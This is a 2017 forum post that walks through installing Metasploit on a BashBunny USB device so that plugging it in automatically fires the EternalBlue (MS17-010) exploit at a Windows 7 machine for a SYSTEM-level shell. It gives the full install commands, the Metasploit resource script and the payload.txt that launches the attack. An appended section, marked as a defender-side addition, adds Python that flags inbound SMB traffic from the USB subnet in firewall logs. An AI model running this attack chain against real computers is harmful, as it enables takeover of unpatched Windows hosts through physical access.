hanshaze Posted September 25, 2017 (edited)

My latest BashBunny challenge: MSF - MS17_010 - BashBunny

Thanks to Astr0baby, I am just a sharer of his excellent thoughts.

Let's go.....

Make sure to set some date for TLS/SSL to work ;)

# date -s "20170925"

Add this to /etc/apt/sources.list

deb http://http.us.debian.org/debian/ jessie-updates main

# apt-get update
# apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev
# curl -sSL https://get.rvm.io | bash -s stable
# source /etc/profile.d/rvm.sh
# rvm requirements
# rvm list known
# rvm install 2.4.1
# vi /root/.bashrc

Add at the end

source /etc/profile.d/rvm.sh
rvm use 2.4.1 --default

# mkdir /root/METASPLOIT
# cd /root/METASPLOIT/
# wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh
# chmod +x msf_vps_installer.sh
# ./msf_vps_installer.sh
# git config --global user.name "USER"
# git config --global user.email "email@example.com"
# ./msfupdate

Check the /etc/dhcp/dhcpd.conf: the range 172.16.64.10 - 172.16.64.12 should be set to only one value, range 172.16.64.64 - 172.16.64.64

Save this to ~/metasploit-framework as cmd.rc

-----
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/exec
set RHOST 172.16.64.64
set CMD cmd.exe
exploit
-----

The above is ideal when we want to get a NT SYSTEM/AUTHORITY shell on the target Windows 7 SP1 x64 (unlocked). If the target is locked we can use another payload such as this one. So RHOST would be again 172.16.64.64 and LHOST 172.16.64.1 …

This can be easily scripted via a Metasploit RC script, so ;)

The Metasploit RC scripts should be placed in /root/metasploit-framework on the BashBunny so we can call them from the PAYLOAD.TXT for the corresponding Attack Switch position. So ideally this would look like this (switch1 or switch2):

payload.txt
-----
#!/bin/bash
LED SETUP
ATTACKMODE RNDIS_ETHERNET
# Set some current time ..... check your watch
date -s "20170523 23:23"
LED ATTACK
/root/metasploit-framework/msfconsole -r /root/metasploit-framework/cmd.rc &
LED FINISH
-----

The target Windows 7 should have an accessible SMB port 445 from the USB network that the BashBunny device creates. A default Windows system has the firewall on, so the attack won't work as the port is blocked. For demonstration purposes we assume there is no firewall on ..

After a while you should get a NT AUTHORITY\SYSTEM cmd shell pop up on your Win 7 desktop :)

Edited September 25, 2017 by hanshaze
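Added here as a defender-side example, not code from hanshaze's post or from Astr0baby's material: the post relies on the host accepting SMB on TCP/445 from the 172.16.64.0/24 network that the RNDIS adapter brings up, so a simple check over Windows Firewall log lines (pfirewall.log format) can flag any inbound 445 traffic, allowed or dropped, whose source sits on a subnet only a USB network gadget would use. The sample log lines and the USB_NETS list are constructed assumptions for the example.

```python
import ipaddress
from dataclasses import dataclass
from typing import Iterable, List

# Constructed sample in Windows Firewall pfirewall.log format (not real traffic).
# Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
SAMPLE_LOG = """\
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2017-09-25 23:23:05 DROP TCP 172.16.64.1 172.16.64.64 49152 445 52 S 1234567 0 8192 - - - RECEIVE
2017-09-25 23:23:07 ALLOW TCP 172.16.64.1 172.16.64.64 49153 445 0 - 0 0 0 - - - RECEIVE
2017-09-25 23:23:09 ALLOW TCP 10.0.0.5 10.0.0.7 50001 445 0 - 0 0 0 - - - RECEIVE
2017-09-25 23:23:11 ALLOW UDP 172.16.64.1 172.16.64.64 68 67 0 - - - - - - - RECEIVE
"""

# Assumed: the only prefix a host should see on a USB RNDIS adapter is the
# BashBunny default 172.16.64.0/24 from the post; extend for other USB gadgets.
USB_NETS = [ipaddress.ip_network("172.16.64.0/24")]
SMB_PORT = "445"

@dataclass
class Finding:
    time: str
    action: str
    src: str
    dst: str
    severity: str  # "high" = SMB session let through, "medium" = blocked attempt

def is_usb_source(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in USB_NETS)

def find_smb_from_usb_net(lines: Iterable[str]) -> List[Finding]:
    """Flag inbound TCP/445 from a USB-only subnet, whether allowed or dropped."""
    findings = []
    for line in lines:
        if not line or line.startswith("#"):
            continue  # header / comment lines
        f = line.split()
        if len(f) < 17:
            continue  # truncated or foreign line
        date, time, action, proto, src, dst, _sport, dport = f[:8]
        path = f[16]
        if proto != "TCP" or dport != SMB_PORT or path != "RECEIVE":
            continue  # only inbound SMB is of interest here
        if not is_usb_source(src):
            continue
        sev = "high" if action == "ALLOW" else "medium"
        findings.append(Finding(f"{date} {time}", action, src, dst, sev))
    return findings
```

A DROP hit means the default firewall did its job but a device on the USB link still tried; an ALLOW hit means the profile or a rule exposed 445 to that adapter and is worth fixing.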